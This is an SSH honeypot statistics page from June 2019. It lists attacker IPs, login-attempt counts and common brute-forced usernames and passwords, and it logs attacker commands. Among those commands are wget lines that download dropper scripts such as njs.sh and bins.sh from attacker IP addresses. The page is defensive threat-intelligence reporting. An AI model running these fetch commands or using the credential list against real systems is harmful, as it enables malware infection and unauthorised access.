Honeypot SSH

This page is updated daily. Last update: 2019-06-24 22:02:11 UTC

The followings SSH blacklists (updated every day and in text format) contains IP addresses of hosts which tried to bruteforce into my honeypot located in Italy.
Monthly SSH login attempts

Attackers blacklists (IP address)

24 hours (txt)week (txt)year (txt)

Statistics - 2019

Unique IP address5464
Unique username7124
Unique password22410

Other informations

Latest files downloaded
All passwords order by length (txt)
All clients version (txt)

Latest commands executed

Timestamp Command Success IP address AS AS Org Country
2019-06-24 18:42:38cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok46.101.98.24214061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 18:42:38wget http://107.173.145.175/njs.shok46.101.98.24214061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 16:23:50cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok139.59.143.19914061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 16:23:50wget http://107.173.145.175/njs.shok139.59.143.19914061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 16:22:47cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok139.59.143.19914061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 16:22:47wget http://107.173.145.175/njs.shok139.59.143.19914061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 13:50:52cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok46.101.98.24214061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 13:50:52wget http://107.173.145.175/njs.shok46.101.98.24214061DIGITALOCEAN-ASN DigitalOcean, LLC, USDE
2019-06-24 13:11:30cd /tmp cd /run cd /ok80.211.3.10931034ARUBA-ASN, ITDK
2019-06-24 13:11:30wget http://185.172.110.239/cyobins.shok80.211.3.10931034ARUBA-ASN, ITDK

Latest URL

Timestamp URL Shasum - VirusTotal analysis
2019-06-24 20:42:39hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 18:24:31hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 15:50:52hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 15:11:30hxxp://185.172.110.239/cyobins.sh9287b4da3a8182871889d730e97e7ed01522876fe5a78e86aa320b13c49f25c8
2019-06-24 13:28:12hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 13:26:45hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 12:56:26hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 09:49:50hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342
2019-06-24 09:13:28hxxp://185.172.110.239/cyobins.sh9287b4da3a8182871889d730e97e7ed01522876fe5a78e86aa320b13c49f25c8
2019-06-24 04:34:48hxxp://107.173.145.175/njs.sh472bfb5c4a8e508f3462fee74caf8db7b917660b4198213d921c2ffed74b7342

Latest VirusTotal analysis

Datetime Filename (shasum) - VirusTotal analysis Virustotal scan date Virustotal results
2019-06-220be3bf564d5f3b503f01d0554dc8c950f6977be7c8c4a40e586601f092fa9fd6-0/0
2019-06-221281b6ae6b51c783d9f79b9d6724973cfd53e0c86d71529f6e540459d923bbbc-0/0
2019-06-22803d7241621aa6d083c32db31c27a2077d49edf1ee6a097a3514f109096de7162019-06-22 00:07:1129/58
2019-06-219287b4da3a8182871889d730e97e7ed01522876fe5a78e86aa320b13c49f25c82019-06-21 06:27:2526/57
2019-06-208abb8422940a4ab0a9a234acecc082ef07b208dd2f8d8bb906bca4b66369b6a92019-06-05 17:09:0226/58
2019-06-202b7befb1c6ce058ad728802572af8f16a2525da74a7d358f1078f0d77bd74bcf2019-06-19 14:34:4523/57
2019-06-20ec9241875de6cad65f493d95c05c7c0c005b17b7937a628a14d2852567003d26-0/0
2019-06-2027ceee22bf692ebb14450d8a0a9e2c553ed5f5c6a0b229818708c81ab97e075b2019-06-19 06:21:4528/58
2019-06-19b11da3a38c8f4d01e2589d8db8246b21cf4eeac25defa1564867cf2b819fd9702019-06-18 06:29:1827/56
2019-06-188d6f8df7d940a0ef44eebe804eb0b3ba5e98cf2822dfd54235017818d6ab99ad2019-06-17 23:27:3926/58

Top most sessions per distinct IP address - 2019

IP Address AS AS Org Country
5.188.86.211 (virustotal)49453GLOBALLAYER, NLRU
88.214.26.90 (virustotal)201912FCLOUD-AS, DEUNK
5.188.87.55 (virustotal)57172GLOBALLAYER, NLRU
5.188.87.52 (virustotal)57172GLOBALLAYER, NLRU
5.188.87.49 (virustotal)57172GLOBALLAYER, NLRU
5.188.87.54 (virustotal)57172GLOBALLAYER, NLRU
5.188.87.51 (virustotal)57172GLOBALLAYER, NLRU
5.188.87.53 (virustotal)57172GLOBALLAYER, NLRU
134.19.187.75 (virustotal)49453GLOBALLAYER, NLNL
5.188.86.210 (virustotal)49453GLOBALLAYER, NLRU

Login attempts last 10 days

Date Occurrences
2019-06-251
2019-06-245459
2019-06-234808
2019-06-223427
2019-06-219052
2019-06-2014408
2019-06-1915082
2019-06-1815810
2019-06-1715265
2019-06-167557

Top username - 2019

Username
root
admin
user
ubnt
guest
ftp
default
test
support
nagios

Top password - 2019

Password
root
123456
admin
1234
password
12345
ubnt
test
123
user

Top username/password - 2019

Username / Password
root / root
admin / admin
ubnt / ubnt
user / user
support / support
admin / password
admin / 1234
root / password
root / admin
admin / 12345

Top commands - 2019

Command
cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /
wget http://107.173.145.175/njs.sh
/gisdfoewrsfdf
wget http://102.165.49.69/bins.sh
wget http://102.165.50.10/bins.sh
echo -e '\x47\x72\x6f\x70/' > //.nippon
cat //.nippon
rm -f //.nippon
cd /tmp cd /run cd /
uname -a

Top tunnelling port - 2019

Port #

Top tunnelling IP address - 2019

IP address DNS AS AS Org Country #
ya.ru (virustotal)n/a--UNK652683
163.172.20.152 (virustotal)163-172-20-152.rev.poneytelecom.eu12876AS12876, FRGB19974
www.google.com (virustotal)163-172-20-152.rev.poneytelecom.eu--UNK14947
69.31.136.5 (virustotal)n/a3257GTT-BACKBONE GTT, DEUS14909
104.47.12.33 (virustotal)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US9304
104.47.6.33 (virustotal)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US9299
104.47.9.33 (virustotal)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US9247
104.47.4.33 (virustotal)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US9147
104.47.10.33 (virustotal)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US9024
104.47.0.33 (virustotal)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US8918